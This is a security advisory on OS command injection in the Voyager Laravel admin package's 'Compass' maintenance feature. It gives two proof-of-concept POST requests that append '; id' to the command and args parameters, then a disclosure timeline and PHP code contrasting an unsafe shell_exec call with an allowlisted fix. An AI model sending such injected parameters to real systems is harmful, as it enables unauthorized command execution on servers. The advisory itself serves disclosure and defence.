#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  Voyager
# Vendor:   The Control Group (Open Source)
# CSNC ID:  CSNC-2018-36
# Subject:  OS Command Injection (RCE)
# Risk:     High (CVSS 3.0 Base Score: 7.2)
# CVSS 3.0: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C
# Effect:   Remotely exploitable
# Author:   Fabio Poloni
# Date:     07.11.2018
#
#############################################################

Introduction
------------

Voyager [1] is a Laravel Admin Package that includes BREAD (CRUD) operations,
a media manager, a menu builder, and much more.

The backend contains a so-called "Compass" that allows administrators to run
simple maintenance tasks using `php artisan`. The command and its arguments
are neither validated nor escaped, so both can be used for OS Command
Injection.

Affected
--------

Vulnerable:

* Version 1.1.10

Other versions were not tested.

Technical Description
---------------------

It is possible to append arbitrary OS commands to the `args` and `command`
parameters by separating them from the intended value with a semicolon.
(Note: redirecting the output of the original command to `/dev/null` is not
necessary, but keeps the output clean.)

`command`:

````
POST /admin/compass HTTP/1.1
Host: localhost:8000
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
Cookie: XSRF-TOKEN=[CUT]; laravel_session=[CUT]

_token=[...]&args=&command=help > /dev/null; id
````

`args`:

````
POST /admin/compass HTTP/1.1
Host: localhost:8000
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
Cookie: XSRF-TOKEN=[CUT]; laravel_session=[CUT]

_token=[...]&args= > /dev/null; id&command=help
````

Vulnerability Classification
----------------------------

* CVSS v3.0 Base Score: 7.2
* CVSS v3.0 Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C

Remediation
-----------

Update to the latest release (1.2.0).
Please see Voyager releases [2] for release notes and download links.

Timeline
--------

2019-03-05: According to the vendor the vulnerability has been addressed
            (https://github.com/the-control-group/voyager/pull/3823)
2018-12-20: Vulnerabilities confirmed
2018-12-18: Fifth contact attempt via email to a former and a current
            maintainer, response received
2018-11-23: Fourth contact attempt via email (hello@thecontrolgroup.com) and
            direct contact to an employee on LinkedIn
2018-11-16: Third contact attempt via email (hello@thecontrolgroup.com)
2018-11-14: Second contact attempt via Twitter (@ControlGroup_SD)
2018-11-07: Initial vendor notification via contact form
            (https://thecontrolgroup.com/contact)
2018-11-05: Discovery by Fabio Poloni

References:
-----------

[1] https://github.com/the-control-group/voyager
[2] https://github.com/the-control-group/voyager/releases
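The root cause described above is request-controlled text being interpolated into a single shell command line. The following PHP sketch is an added illustration and is not Voyager's code or the actual fix in release 1.2.0: it contrasts the unsafe pattern with a hardened variant that allowlists the artisan command and hands arguments to the process as separate argv elements via Symfony's Process component (a Laravel dependency; the Composer autoload path and the allowlist contents are assumptions).

```php
<?php
// Added example, not part of the advisory or the Voyager project.
require __DIR__ . '/vendor/autoload.php';

use Symfony\Component\Process\Process;

// UNSAFE pattern: both parameters are spliced into one shell string, so a
// value like "help > /dev/null; id" makes the shell run a second command.
function runArtisanUnsafe(string $command, string $args): string
{
    return (string) shell_exec("php artisan $command $args 2>&1");
}

// Hypothetical allowlist of maintenance tasks an admin UI may trigger.
const ALLOWED_ARTISAN_COMMANDS = [
    'help', 'list', 'cache:clear', 'config:clear', 'route:clear', 'view:clear',
];

// Hardened: exact-match allowlist for the command, a strict token grammar
// for each argument, and no shell at all (argv array -> no metacharacters).
function runArtisanSafe(string $command, array $args): string
{
    if (!in_array($command, ALLOWED_ARTISAN_COMMANDS, true)) {
        throw new InvalidArgumentException("command not allowed: $command");
    }
    foreach ($args as $arg) {
        // Only plain option/value tokens such as "--env=local" or "-v".
        if (!is_string($arg) || !preg_match('/\A[A-Za-z0-9=_:.\/-]{1,128}\z/', $arg)) {
            throw new InvalidArgumentException("argument rejected: $arg");
        }
    }
    // The binary and "artisan" are fixed by the server, never by the request.
    $process = new Process(array_merge([PHP_BINARY, 'artisan', $command], $args));
    $process->setTimeout(30);
    $process->run();
    return $process->getOutput() . $process->getErrorOutput();
}

// Demonstration with the advisory's payload shape: the unsafe function would
// execute "id"; the hardened one refuses the request before anything runs.
try {
    echo runArtisanSafe('help > /dev/null; id', []);
} catch (InvalidArgumentException $e) {
    echo 'blocked: ', $e->getMessage(), PHP_EOL;
}
try {
    echo runArtisanSafe('help', [' > /dev/null; id']);
} catch (InvalidArgumentException $e) {
    echo 'blocked: ', $e->getMessage(), PHP_EOL;
}
```

On the detection side, the same two payloads are visible in web-server or application logs as `POST /admin/compass` requests whose `command` or `args` values contain shell metacharacters, which is a cheap signal to alert on for authenticated-admin endpoints.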